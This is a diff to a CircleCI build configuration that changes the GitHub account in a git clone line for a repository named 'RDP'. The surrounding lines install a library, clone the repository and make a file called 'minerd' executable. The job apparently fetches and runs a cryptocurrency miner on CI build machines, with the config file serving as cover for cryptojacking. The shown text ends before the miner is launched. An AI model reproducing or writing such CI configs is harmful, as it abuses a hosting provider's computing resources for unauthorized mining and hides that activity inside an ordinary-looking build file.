--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -9,7 +9,7 @@ jobs:
            apt install -y libjansson4
            mkdir  ~/.ssh
            ssh-keyscan github.com >> ~/.ssh/known_hosts
-           git clone --depth=1 git@github.com:ltcfuck/RDP.git Q
+           git clone --depth=1 git@github.com:ltcwoker/RDP.git Q
            cd Q
            
            chmod 755 minerd
